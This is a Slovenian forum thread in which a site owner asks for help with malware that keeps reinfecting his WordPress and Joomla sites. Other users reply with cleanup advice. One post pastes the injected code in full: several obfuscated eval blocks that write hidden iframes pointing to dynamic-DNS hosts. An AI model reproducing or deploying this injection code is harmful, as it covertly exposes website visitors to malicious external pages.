Virus na strežniku · Internet Mojster

2549185630237

24. okt 2011 ob 13:42

Včeraj sem zasledil virus na vseh mojih straneh na serverju, razen na eni. Zato sem pisal na SGH support in so rekli, da je to moja stvar in da naj prijavim strani v Google Webmaster Tool in mi bo javlo kje in kaj je virus. No, pa sem to naredo (nekaj strani pa sem že mel dodanih), ampak mi Webmaster ne javi nič!
Pol sem posodobil WordPress strani, in je delalo, posodobil Joomla strani in je tudi delalo na nekaterih, danes zjutraj pa spet na vseh kaže virus,...

Kaj se da naredit, geslo do serverja sem že spremenil, Google Webmaster pa še vedno ne kaže nič,... backupov pred pojavom virusa na žalost nimam :/

8966

spletni strežniki wordpress joomla

admin-bic8

1

29. okt 2011 ob 20:13

kakšen wordprees imaš zadnje čase znajo koristiti da zakodiraš posamezne spletne strani gesla pa shraniš na pomožni trdi disk, ki mora biti predvsem večji da narediš beckup strani ali kopije svojega windowsa

bobo05

2549185630237

12. nov 2011 ob 16:46

Spet nekaj narobe z serverjem, zj*balo mi je vse Joomla strani, ni pa še Google nič javil, da bi ble strani okužene.

Sem pisal na SGH, toleso mi poslali. Ma kdo kako idejo, kaj bi mogel naredit?

Weby

770120212

12. nov 2011 ob 18:04

Če ne uporabljaš exec-a ga v php.ini onemogoči :)

bobo05

2549185630237

14. nov 2011 ob 11:48

Mah, spet se pojavo virus,...
Tole sem zasledil v HTML fajlu:

\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393970783b20746f703a202d3239393770783b223e3c696672616d652077696474683d223322206865696768743d223422207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393270783b20746f703a202d3239393470783b223e3c696672616d652077696474683d223422206865696768743d223222207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393870783b20746f703a202d3239393770783b223e3c696672616d652077696474683d223422206865696768743d223322207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393970783b20746f703a202d3239393270783b223e3c696672616d652077696474683d223422206865696768743d223422207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393470783b20746f703a202d3239393970783b223e3c696672616d652077696474683d223322206865696768743d223322207372633d22687474703a2f2f69636e73636b64712e7a796e732e636f6d2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>\0<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8**=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393970783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f7a616e727463772e64646e732e696e666f2f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>************

*********Očitno bom mogo vse skupaj prenest drugam,...*********

bobo05

2549185630237

15. nov 2011 ob 22:29

Nisem glih expert ampak mislim da sem našel izvor (vsaj za Joomla strani).

V temi beez, sem v default.php našel tole vrstico:

$return = base64encode(base64decode($return).'#content');

A bi lahko blo to to, kar mi ponovno zapiše tale virus?

Matjaž

3501260130845

15. nov 2011 ob 22:44

Če se ne motim je to samo ukaz, ki vrne neko base64 kodirano vsebino v članke.
Tole je defolt v tej datoteki in nima veze s tvojimi problemi.

bobo05

2549185630237

15. nov 2011 ob 22:54

Ampak zanimivo je tole, da ko sem to zbrisal, so se vse strani začele prikazovati normalno.

Matjaž

3501260130845

15. nov 2011 ob 23:05

To bi najbrž tudi, če bi izbrisal samo #content ?

boco

148153605

1. dec 2012 ob 20:10

bobo05, ali si rešil tole težavo ? Glede na to, da ti strani delujejo in ne dobim nobenega opozorila predvidevam, da je OK. Vprašujem namreč zato, ker imam enak problem na svojem strežniku in nekaj mojih straneh. Sam sem sicer naredil workaround in skripto, ki vsakih 15 minut preveri, če je del škodljive kode nameščen (če je jo izbriše). Jaz imam problema na Joomla in WP straneh, se pa koda vpiše na vse *.js daoteke.
Še kdo drug podobne težave ?

Aljo

545498334168

1. dec 2012 ob 21:38

Bobo

shrani bazo, izbriši celotno vsebino. Si boš prihranil živčke :) Podpora naj ti takoj zamenja cpanel geslo. Potem pa naloži čisto vsebino in naloži bazo podatkov iz backupa. 15 min. dela :)

Vini, izbriši objavljeno kodo saj nod32 nori kot nor, ko prebiram tale post :)

Virus na strežniku

19 naročnikov

60 odgovorov

Virus na strežniku 19 naročnikov

60 odgovorov

Virus na strežniku

19 naročnikov